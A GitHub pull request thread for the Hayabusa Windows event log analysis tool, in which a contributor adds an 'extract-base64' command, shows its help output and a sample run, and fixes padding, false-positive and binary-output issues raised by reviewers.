feat: extract-base64 cmd

[fukusuket]

What Changed

• Closed New extract-base64 command #1512

Evidence

Integration-Test

• https://github.com/Yamato-Security/hayabusa/actions/runs/12106511834

I would appreciate it if you could check it out when you have time🙏

[fukusuket]

help

fukusuke@fukusukenoMacBook-Air hayabusa-2.19.0-mac-aarch64 % ./hayabusa extract-base64 -h
Hayabusa v3.0.0 - Dev Build
Yamato Security (https://github.com/Yamato-Security/hayabusa - @SecurityYamato)

Usage:
  hayabusa.exe extract-base64 <INPUT> [OPTIONS]

Input:
  -d, --directory <DIR>  Directory of multiple .evtx files
  -f, --file <FILE>      File path to one .evtx file
  -l, --live-analysis    Analyze the local C:\Windows\System32\winevt\Logs folder

General Options:
  -C, --clobber                        Overwrite files when saving
  -h, --help                           Show the help menu
  -J, --JSON-input                     Scan JSON formatted logs instead of .evtx (.json or .jsonl)
  -Q, --quiet-errors                   Quiet errors mode: do not save error logs
  -x, --recover-records                Carve evtx records from slack space (default: disabled)
  -c, --rules-config <DIR>             Specify custom rule config directory (default: ./rules/config)
  -t, --threads <NUMBER>               Number of threads (default: optimal number for performance)
      --target-file-ext <FILE-EXT...>  Specify additional evtx file extensions (ex: evtx_data)

Filtering:
      --exclude-computer <COMPUTER...>  Do not scan specified computer names (ex: ComputerA) (ex: ComputerA,ComputerB)
      --include-computer <COMPUTER...>  Scan only specified computer names (ex: ComputerA) (ex: ComputerA,ComputerB)
      --time-offset <OFFSET>            Scan recent events based on an offset (ex: 1y, 3M, 30d, 24h, 30m)

Output:
  -o, --output <FILE>  Extract Base64 strings

Display Settings:
  -K, --no-color  Disable color output
  -q, --quiet     Quiet mode: do not display the launch banner
  -v, --verbose   Output verbose information

Time Format:
      --European-time     Output timestamp in European time format (ex: 22-02-2022 22:00:00.123 +02:00)
  -O, --ISO-8601          Output timestamp in original ISO-8601 format (ex: 2022-02-22T10:10:10.1234567Z) (Always UTC)
      --RFC-2822          Output timestamp in RFC 2822 format (ex: Fri, 22 Feb 2022 22:00:00 -0600)
      --RFC-3339          Output timestamp in RFC 3339 format (ex: 2022-02-22 22:00:00.123456-06:00)
      --US-military-time  Output timestamp in US military time format (ex: 02-22-2022 22:00:00.123 -06:00)
      --US-time           Output timestamp in US time format (ex: 02-22-2022 10:00:00.123 PM -06:00)
  -U, --UTC               Output time in UTC format (default: local time)

[fukusuket]

-o option

./hayabusa extract-base64 -d ../hayabusa-sample-evtx -o result.csv --ISO-8601 -C -q
Start time: 2024/12/02 00:00
Total event log files: 598
Total file size: 139.2 MB

Loading detection rules. Please wait.

[00:00:00] 598 / 598   [========================================] 100%

Scanning finished.
                                                                                                                                               Saved results: result.csv (610.1 KB)

Elapsed time: 00:00:00.821

[fukusuket]

no -o option

[Shirofune-Security]

@fukusuket Thanks so much! Looking really good, just a few small things:

1. Sometimes the trailing = or == will be found after the <Base64String>. If it is possible, it would be nice to remove those as well.

2. Sometimes there are false positives. I am not sure of a good way to get rid of these kinds of FPs so if there is no good way that will not lower the other detections then don't worry about it. We can leave it in as it is.

3. For the standard output, sometimes the decoded text field is blank. I think this is because the type is binary. Is it possible to output (Binary Data) to make this clearer?

[fukusuket]

@Shirofune-Security @YamatoSecurity
Thank you so much for checking! I fixed 1 and 3 case!💪

2. Sometimes there are false positives.

Sorry ... This is a correct Base64 string, so there is no way around this FP at this time :(

[fukusuket]

@Shirofune-Security @YamatoSecurity

2. Sometimes there are false positives.

Not a complete workaround, but by adding a simple string match, I was able to exclude False Positive!

[YamatoSecurity]

@fukusuket LGTM! Thank you!